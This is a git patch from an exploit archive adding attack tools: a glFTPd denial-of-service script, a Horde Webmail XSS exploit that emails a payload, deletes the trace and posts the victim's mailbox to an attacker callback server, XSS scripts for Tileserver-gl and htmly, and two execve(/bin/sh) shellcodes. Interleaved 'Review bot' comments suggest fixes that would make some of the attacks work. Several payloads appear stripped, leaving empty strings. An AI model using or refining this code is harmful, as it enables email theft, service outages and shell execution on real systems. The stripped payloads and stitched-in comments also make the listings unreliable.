From 53c15c17c6b551739d0fd70384b9aa3348e700fc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 16 Apr 2021 05:02:00 +0000 Subject: [PATCH] DB: 2021-04-16 6 changes to exploits/shellcodes glFTPd 2.11a - Remote Denial of Service Horde Groupware Webmail 5.2.22 - Stored XSS Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS) htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) --- exploits/multiple/dos/49773.py | 101 ++++++++++ exploits/multiple/webapps/49769.py | 283 ++++++++++++++++++++++++++++ exploits/multiple/webapps/49771.txt | 10 + exploits/multiple/webapps/49772.py | 58 ++++++ files_exploits.csv | 4 + files_shellcodes.csv | 2 + shellcodes/linux_x86-64/49770.c | 46 +++++ shellcodes/linux_x86/49768.c | 30 +++ 8 files changed, 534 insertions(+) create mode 100755 exploits/multiple/dos/49773.py create mode 100755 exploits/multiple/webapps/49769.py create mode 100644 exploits/multiple/webapps/49771.txt create mode 100755 exploits/multiple/webapps/49772.py create mode 100644 shellcodes/linux_x86-64/49770.c create mode 100644 shellcodes/linux_x86/49768.c diff --git a/exploits/multiple/dos/49773.py b/exploits/multiple/dos/49773.py new file mode 100755 index 000000000..fdc7cafbe --- /dev/null +++ b/exploits/multiple/dos/49773.py 
@@ -0,0 +1,101 @@ +# Exploit Title: glFTPd 2.11a - Remote Denial of Service +# Date: 15/05/2021 +# Exploit Author: xynmaps +# Vendor Homepage: https://glftpd.io/ +# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz +# Version: 2.11a +# Tested on: Parrot Security OS 5.9.0 + +#-------------------------------# + +#encoding=utf8 +#__author__ = XYN/Dump/NSKB3 +#glFTPd Denial of Service exploit by XYN/Dump/NSKB3. +""" +glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, +you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. +(if it's limited, just run this script from different proxies using proxychains, and it will work) +""" + +import socket +import sys +import threading +import subprocess +import time + +banner = """ +._________________. +| glFTPd | +| D o S | +|_________________| +|By XYN/DUMP/NSKB3| +|_|_____________|_| +|_|_|_|_____|_|_|_| +|_|_|_|_|_|_|_|_|_| + +""" +usage = "{} ".format(sys.argv[0]) + +def test(t,p): + s = socket.socket() + s.settimeout(10) + try: + s.connect((t, p)) + response = s.recv(65535) + s.close() + return 0 + except socket.error: + print("Port {} is not open, please specify a port that is open.".format(p)) + sys.exit() +def attack(targ, po, id): + try: + subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + #print("Worker {} running".format(id)) + except OSError: pass +def main(): + global target, port, start + print banner + try: + target = sys.argv[1] + except: + print usage + sys.exit() + try: + port = int(sys.argv[2]) + except: + port = 21 + try: + conns = int(sys.argv[3]) + except: + conns = 50 + print("[!] 
Testing if {0}:{1} is open".format(target, port)) + test(target, port) + print("[+] Port {} open, starting attack...".format(port)) + time.sleep(2) + print("[+] Attack started on {0}:{1}!".format(target, port)) + def loop(target, port, conns): + global start + threading.Thread(target=timer).start() + while 1: + for i in range(1, conns + 3): + t = threading.Thread(target=attack, args=(target,port,i,)) + t.start() + if i > conns + 2: + t.join() + break + loop() + + t = threading.Thread(target=loop, args=(target, port, conns,)) + t.start() + +def timer(): + start = time.time() + while 1: + if start < time.time() + float(900): pass + else: + subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + t = threading.Thread(target=loop, args=(target, port,)) + t.start() + break + +main() \ No newline at end of file diff --git a/exploits/multiple/webapps/49769.py b/exploits/multiple/webapps/49769.py new file mode 100755 index 000000000..3aaeec7e0 --- /dev/null +++ b/exploits/multiple/webapps/49769.py 
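Review bot: The refresh timer in `timer()` can never fire, because `start < time.time() + float(900)` is true on every iteration (start is always less than "now plus 900 s"), so the thread busy-spins at full CPU and the `pkill ftp` branch is dead code; the intended test is `if time.time() - start < 900: time.sleep(1); continue` (or equivalent). Even if that branch were reached it would fail: `loop` is a closure local to `main()` and is called from `timer()` with two arguments although it takes three, the recursive `loop()` call inside the inner function passes no arguments at all, and `if i > conns + 2` cannot be true inside `range(1, conns + 3)`, so the first batch of threads is spawned and then the script dies with a TypeError. `attack()` builds `"ftp {0} {1}"` from argv and runs it with `shell=True`; `subprocess.Popen(["ftp", targ, str(po)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)` avoids the shell, and the returned processes should be kept (and eventually reaped) rather than dropped on the floor. The file mixes Python 2 `print banner` / `print usage` with `print(...)` calls, so it only runs under Python 2 and the header should say so. The `# Date: 15/05/2021` header also postdates the commit itself (2021-04-16) and looks like a typo.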
@@ -0,0 +1,283 @@ +# Exploit Title: Horde Groupware Webmail 5.2.22 - Stored XSS +# Author: Alex Birnberg +# Testing and Debugging: Ventsislav Varbanovski @nu11secur1ty +# Date: 04.14.2021 +# Vendor: https://www.horde.org/apps/webmail +# Link: https://github.com/horde/webmail/releases +# CVE: CVE-2021-26929 + +[+] Exploit Source: +https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929 + +[Exploit Program Code] + +#!/usr/bin/python3 +# Author idea: Alex Birnberg +# debug nu11secur1ty 2021 +import io +import os +import ssl +import sys +import json +import base64 +import string +import random +import logging +import smtplib +import sqlite3 +import hashlib +import zipfile +import argparse +from flask import Flask, request, Response +from urllib.parse import urlparse + +class Exploit: + def __init__(self, args): + # Database + if not os.path.exists('database.db'): + with sqlite3.connect("database.db") as conn: + cursor = conn.cursor() + cursor.execute('CREATE TABLE mailbox (hash TEXT NOT NULL UNIQUE, content BLOB NOT NULL);') + conn.commit() + # SMTP URL + o = urlparse(args.smtp) + self.smtp = { + 'ssl': o.scheme.lower() == 'smtps', + 'host': o.hostname or '127.0.0.1', + 'port': o.port or ('465' if o.scheme.lower() == 'smtps' else '25'), + 'username': '' or o.username, + 'password': '' or o.password + } + try: + if self.smtp['ssl']: + context = ssl.create_default_context() + context.verify_mode = ssl.CERT_OPTIONAL + context.check_hostname = False + self.server = smtplib.SMTP_SSL(self.smtp['host'], self.smtp['port'], context=context) + else: + self.server = smtplib.SMTP(self.smtp['host'], self.smtp['port']) + except Exception as e: + print(e) + print('[-] Error connecting to SMTP server!') + exit() + try: + self.server.login(self.smtp['username'], self.smtp['password']) + except: + pass + # Callback URL + o = urlparse(args.callback) + self.callback = { + 'url': '{}://{}'.format(o.scheme, o.netloc), + 'path': ''.join(random.choice(string.ascii_letters) for i in 
range(20)) + } + # Listener URL + o = urlparse(args.listener) + self.listener = { + 'ssl': o.scheme.lower() == 'https', + 'host': o.hostname or '0.0.0.0', + 'port': o.port or 80, + 'horde': ''.join(random.choice(string.ascii_letters) for i in range(20)) + } + # Target email + self.target = args.target + # Subject + self.subject = args.subject or 'Important Message' + # Environment + self.env = {} + self.env['mailbox'] = args.mailbox or 'INBOX' + self.env['callback'] = '{}/{}'.format(self.callback['url'], self.callback['path']) + + def trigger(self): + print('[*] Waiting for emails...') + self.bypass_auth() + print('\n[*] Done') + + def bypass_auth(self): + def horde(): + f = open('horde.js') + content = 'env = {};\n\n{}'.format(json.dumps(self.env), f.read()) + f.close() + return content + + def callback(): + response = Response('') + with sqlite3.connect("database.db") as conn: + try: + if request.files.get('mbox'): + filename = request.files.get('mbox').filename.replace('zip', 'mbox') + content = request.files.get('mbox').stream.read() + zipdata = io.BytesIO() + zipdata.write(content) + content = zipfile.ZipFile(zipdata) + content = content.open(filename).read() + mail_hash = hashlib.sha1(content).digest().hex() + print('[+] Received mailbox ({})'.format(mail_hash)) + cursor = conn.cursor() + cursor.execute('INSERT INTO mailbox (hash, content) VALUES (?, ?)', (mail_hash, content)) + except: + pass + response.headers['Access-Control-Allow-Origin'] = '*' + return response + + payload = 'var s=document.createElement("script");s.type="text/javascript";s.src="{}/{}";document.head.append(s);'.format(self.callback['url'], self.listener['horde']) + payload = ''.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1')) + content = 'Subject: {}\nFrom: {}\nTo: {}\n'.format(self.subject, self.smtp['username'], self.target) + # The secret services :) + content += 'X\x00\x00\x00{}\x00\x00\x00X'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1')) + 
self.server.sendmail(self.smtp['username'], self.target, content) + app = Flask(__name__) + app.add_url_rule('/{}'.format(self.listener['horde']), 'horde', horde) + app.add_url_rule('/{}'.format(self.callback['path']), 'callback', callback, methods=['POST']) + logging.getLogger('werkzeug').setLevel(logging.ERROR) + cli = sys.modules['flask.cli'] + cli.show_server_banner = lambda *x: None + try: + if self.listener['ssl']: + app.run(host=self.listener['host'], port=self.listener['port'], ssl_context=('cert.pem', 'key.pem')) + else: + app.run(host=self.listener['host'], port=self.listener['port']) + except: + pass + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument('--smtp', help='SMTP URL', required=True, metavar='URL') + parser.add_argument('--callback', help='Callback URL', required=True, metavar='URL') + parser.add_argument('--listener', help='Listener URL', metavar='URL') + parser.add_argument('--target', help='Target email', required=True, metavar='EMAIL') + parser.add_argument('--subject', help='Email subject', metavar='SUBJECT') + parser.add_argument('--mailbox', help='Mailbox from which to steal the emails', metavar='INBOX') + args = parser.parse_args() + exploit = Exploit(args) + exploit.trigger() +horde.js + +class Exploit { + constructor() { + this.basepath = document.location.pathname.substring(0, document.location.pathname.indexOf('imp')); + } + + trigger() { + this.mailbox = this.get_mailbox(); + this.buid = this.get_buid(); + this.token = this.get_token(); + this.auto_delete() + .then(() => { + this.exfiltrate_emails({mailbox: env.mailbox}); + }); + } + + async auto_delete() { + let params = new URLSearchParams() + params.append('token', this.token); + params.append('view', this.mailbox); + params.append('buid', this.buid); + return fetch(this.basepath + 'services/ajax.php/imp/deleteMessages', { + method: 'POST', + body: params + }) + .then(() => { + let params = new URLSearchParams(); + params.append('token', 
this.token); + params.append('view', this.mailbox); + return fetch(this.basepath + 'services/ajax.php/imp/purgeDeleted', { + method: 'POST', + body: params + }) + .then(() => { + if (document.getElementById('checkmaillink') !== null) { + document.getElementById('checkmaillink').click(); + } + }); + }); + } + + async exfiltrate_emails(args) { + let mbox_list = '["' + this.get_mailbox() + '"]'; + if (args.mailbox.toUpperCase() != 'INBOX') { + let params = new URLSearchParams(); + params.append('reload', '1'); + params.append('unsub', '1'); + params.append('token', this.token); + let mailboxes = await fetch(this.basepath + 'services/ajax.php/imp/listMailboxes', { + method: 'POST', + body: params + }) + .then(response => { + return response.text(); + }) + .then(data => { + return JSON.parse(data.substring(10, data.length - 2)); + }); + mailboxes.tasks['imp:mailbox'].a.forEach(mailbox => { + if (mailbox.l.toUpperCase() == args.mailbox) { + if (mbox_list === undefined) { + mbox_list = '["' + mailbox.m + '"]'; + } + } + }); + } + let zip = await fetch(this.basepath + 'services/download/?app=imp&actionID=download_mbox&mbox_list=' + mbox_list + '&type=mboxzip&token=' + this.token + '&fn=/') + .then(response => { + return [response.blob(), response.headers.get('Content-Disposition')]; + }); + let filename = zip[1]; + filename = filename.substring(filename.indexOf('filename="') + 10, filename.length - 1); + zip = await zip[0]; + let formData = new FormData(); + formData.append('mbox', zip, filename); + fetch(window.env.callback, { + method: 'POST', + body: formData + }); + } + + get_token() { + let link; + let token; + if (document.getElementsByClassName('smartmobile-logout').length > 0) { + link = document.getElementsByClassName('smartmobile-logout')[0].href; + } + else if (document.getElementById('horde-logout') !== null) { + link = document.getElementById('horde-logout').getElementsByTagName('a')[0].href; + } + else { + link = location.href; + } + if 
(link.match('horde_logout_token=(.*)&') !== null) { + token = link.match('horde_logout_token=(.*)&')[1]; + } + if (token === undefined && link.match('token=(.*)&') !== null) { + token = link.match('token=(.*)&')[1]; + } + return token; + } + + get_mailbox() { + if (window.DimpBase !== undefined) { + return DimpBase.viewport.getSelection(DimpBase.pp.VP_view).search({ + VP_id: { + equal: [ DimpBase.pp.VP_id ] + } + }).get('dataob').first().VP_view; + } + else if (location.href.match('mailbox=([A-Za-z0-9]*)') !== null) { + return location.href.match('mailbox=([A-Za-z0-9]*)')[1]; + } + else if (location.href.match('mbox=([A-Za-z0-9]*)') !== null) { + return location.href.match('mbox=([A-Za-z0-9]*)')[1]; + } + } + + get_buid() { + if (location.href.match('buid=([0-9]*)') !== null) { + return location.href.match('buid=([0-9]*)')[1]; + } + else if (location.href.match(';([0-9]*)') !== null) { + return location.href.match(';([0-9]*)')[1]; + } + } +} + +const exploit = new Exploit(); +exploit.trigger(); \ No newline at end of file diff --git a/exploits/multiple/webapps/49771.txt b/exploits/multiple/webapps/49771.txt new file mode 100644 index 000000000..f6092e1bd --- /dev/null +++ b/exploits/multiple/webapps/49771.txt @@ -0,0 +1,10 @@ +# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS) +# Date: 15/04/2021 +# Exploit Author: Akash Chathoth +# Vendor Homepage: http://tileserver.org/ +# Software Link: https://github.com/maptiler/tileserver-gl +# Version: versions <3.1.0 +# Tested on: 2.6.0 +# CVE: 2020-15500 + +Exploit : http://example.com/?key="> \ No newline at end of file diff --git a/exploits/multiple/webapps/49772.py b/exploits/multiple/webapps/49772.py new file mode 100755 index 000000000..d02332c79 --- /dev/null +++ b/exploits/multiple/webapps/49772.py 
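Review bot: As committed, `49769.py` is not a runnable Python file: it opens with prose (`[+] Exploit Source:` ...) and the `horde.js` listing is appended to the same file after the `if __name__ == '__main__':` block, so `f = open('horde.js')` in `horde()` can only work once the JavaScript is split out into a sibling file, which the listing should state. The line `payload = ''.format(base64.b64encode(...))` carries an empty format string, so the HTML vector that is supposed to wrap the base64 loader is missing here; this looks like markup stripped during extraction and should be checked against the upstream source rather than indexed as-is. In the SMTP setup, `context.check_hostname = False` together with `context.verify_mode = ssl.CERT_OPTIONAL` disables server certificate verification, so the `--smtp` credentials go to whichever host answers; use `ssl.create_default_context()` unmodified unless the operator explicitly opts out. In `exfiltrate_emails`, `mbox_list` is assigned before the loop, so the `if (mbox_list === undefined)` guard is never true and the `--mailbox` option never changes which mailbox is downloaded; drop the guard (`mbox_list = '["' + mailbox.m + '"]';` unconditionally inside the match). The `callback()` route is guarded only by its random path, answers any origin with `Access-Control-Allow-Origin: *`, and swallows every failure with a bare `except: pass`, so a malformed or hostile upload is indistinguishable from a successful one; at least log the exception.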
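Review bot: The PoC line ends at `key=">`, so the injected markup that would actually demonstrate the reflected XSS appears to have been stripped from this entry; it should be checked against the original submission before it is indexed. The header is also inconsistent with itself: the title says 3.0.0, `# Version:` says `<3.1.0` and `# Tested on:` says 2.6.0, and the `# CVE:` field lacks the usual prefix (`# CVE: CVE-2020-15500`).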
@@ -0,0 +1,58 @@ +# Exploit Title: htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS) +# Authors: @nu11secur1ty & G.Dzhankushev +# Date: 04.15.2021 +# Vendor Homepage: https://www.htmly.com/ +# Software Link: https://github.com/danpros/htmly +# CVE: CVE-2021-30637 + +#!/usr/bin/python3 + +from selenium import webdriver +from selenium.webdriver.common.by import By +from selenium.webdriver.support.ui import WebDriverWait +from selenium.webdriver.support import expected_conditions as EC +import time + + +#enter the link to the website you want to automate login. +website_link="http://localhost/htmly/login" + +#enter your login username +username="nu11secur1ty" + +#enter your login password +password="password" + +#enter the element for username input field +element_for_username="user" +#enter the element for password input field +element_for_password="password" +#enter the element for submit button +element_for_submit="submit" + + +#browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] +browser = webdriver.Chrome() #uncomment this line,for chrome users +#browser = webdriver.Firefox() #uncomment this line,for chrome users + +browser.get((website_link)) + +try: + username_element = browser.find_element_by_name(element_for_username) + username_element.send_keys(username) + password_element = browser.find_element_by_name(element_for_password) + password_element.send_keys(password) + signInButton = browser.find_element_by_name(element_for_submit) + signInButton.click() + + # Exploit .ini + browser.get(("http://localhost/htmly/admin/config")) + browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = ''") + time.sleep(3) + browser.execute_script("document.querySelector('.btn.btn-primary').click()") + + print("payload is deployed...\n") + +except Exception: + #### This exception occurs if the element are not found in the webpage. + print("Some error occured :(") \ No newline at end of file 
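Review bot: The value written by `browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = ''")` is an empty string, so as listed the script only blanks the blog description and never stores a script payload; this looks like markup stripped in extraction and should be verified against the upstream source before publication. The `#!/usr/bin/python3` shebang sits on line 8, after the header comments, where the loader ignores it; move it to line 1. `By` is imported but unused while the locators use `find_element_by_name`, which Selenium 4 removed; `browser.find_element(By.NAME, element_for_username)` keeps the script working on current drivers. The catch-all `except Exception: print("Some error occured :(")` hides the actual failure; log the exception (and fix the `occured` typo) so a missing form element is distinguishable from a failed login. The hard-coded `website_link`, `username` and `password` should at least be documented as the values to change, since nothing else tells the reader this is a template.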
diff --git a/files_exploits.csv b/files_exploits.csv
index eb010674b..6a073bfa0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6777,6 +6777,7 @@ id,file,description,date,author,type,platform,port
 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple,
 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
+49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -43944,3 +43945,6 @@ id,file,description,date,author,type,platform,port
 49764,exploits/hardware/webapps/49764.txt,"Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE",2021-04-14,"Jay Sharma",webapps,hardware,
 49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,
 49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,
+49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",2021-04-15,nu11secur1ty,webapps,multiple,
+49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",2021-04-15,"Akash Chathoth",webapps,multiple,
+49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 7bafdcd84..32307fc3b 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1032,3 +1032,5 @@ id,file,description,date,author,type,platform
 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
 49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64
 49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86
+49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",2021-04-15,s1ege,shellcode,linux_x86
+49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/49770.c b/shellcodes/linux_x86-64/49770.c
new file mode 100644
index 000000000..a366533b3
--- /dev/null
+++ b/shellcodes/linux_x86-64/49770.c
@@ -0,0 +1,46 @@
+# Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)
+# Author: s1ege
+# Tested on: x86_64 GNU/Linux
+# Shellcode Length: 21
+
+/*
+
+################################################
+objdump disassembly
+################################################
+401000: 50 push %rax
+401001: 48 31 d2 xor %rdx,%rdx
+401004: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
+40100b: 2f 73 68
+40100e: 53 push %rbx
+40100f: 54 push %rsp
+401010: 5f pop %rdi
+401011: b0 3b mov $0x3b,%al
+401013: 0f 05 syscall
+################################################
+
+################################################
+shellcode.asm
+################################################
+; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode
+section .text
+global _start
+_start:
+push rax
+xor rdx, rdx
+mov rbx, 0x68732f2f6e69622f
+push rbx
+push rsp
+pop rdi
+mov al, 59
+syscall
+################################################
+*/
+unsigned char shellcode[] = \
+"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
+
+int main() {
+int (*ret)() = (int(*)())shellcode;
+ret();
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/49768.c b/shellcodes/linux_x86/49768.c
new file mode 100644
index 000000000..7ddc7df3c
--- /dev/null
+++ b/shellcodes/linux_x86/49768.c
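Review bot: The stub never initializes rax or rsi, so it is only correct when both happen to be zero on entry: `push rax` is what supplies the NUL terminator after `/bin//sh`, `mov al, 59` writes only the low byte of the syscall number, and rsi is handed to execve as argv untouched; that holds for a freshly started process but not for an arbitrary injection point. State the precondition in the asm listing, e.g. `; requires rax == 0 and rsi == 0 on entry (true at process start); argv/envp are then NULL`, or spend four more bytes on `xor eax, eax` / `xor esi, esi` and change the advertised length accordingly. The C harness omits the build line that makes a jump into a data array work; `// build: gcc -fno-stack-protector -z execstack 49770.c` belongs above `main()`, since a default NX build faults on `ret()`. Unlike the x86 sibling, this file has no `#include` lines and no length print, so the test program gives no feedback before it jumps.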
@@ -0,0 +1,30 @@
+# Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
+# Author: s1ege
+# Tested on: i686 GNU/Linux
+# Shellcode length: 17
+
+/*
+; nasm -felf32 shellcode.asm && ld -melf_i386 shellcode.o -o shellcode
+section .text
+global _start
+_start:
+push 0x0b
+pop eax
+push 0x0068732f
+push 0x6e69622f
+mov ebx, esp
+int 0x80
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+
+int main() {
+printf("Shellcode Length: %lu\n", sizeof(code)-1); // subtract null byte
+int (*ret)() = (int(*)())code;
+ret();
+return 0;
+}
\ No newline at end of file
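Review bot: The byte string contains a NUL (`\x68\x2f\x73\x68\x00`, the immediate of `push 0x0068732f`), so this shellcode is not NUL-free and is truncated by any `strcpy`-style sink; the header should say so, or the stub should push `//sh` (`push 0x68732f2f`) after a zeroed register as the x64 sibling does, at a cost of two bytes. As in that sibling, ecx and edx, which the kernel reads as argv and envp, are never set, so the stub depends on whatever they hold at entry; that precondition belongs in a comment next to `mov ebx, esp`. As rendered here the two `#include` lines have lost their header names, and the build line that makes `ret()` into a data array work (`// build: gcc -m32 -fno-stack-protector -z execstack 49768.c`) is not recorded anywhere in the file.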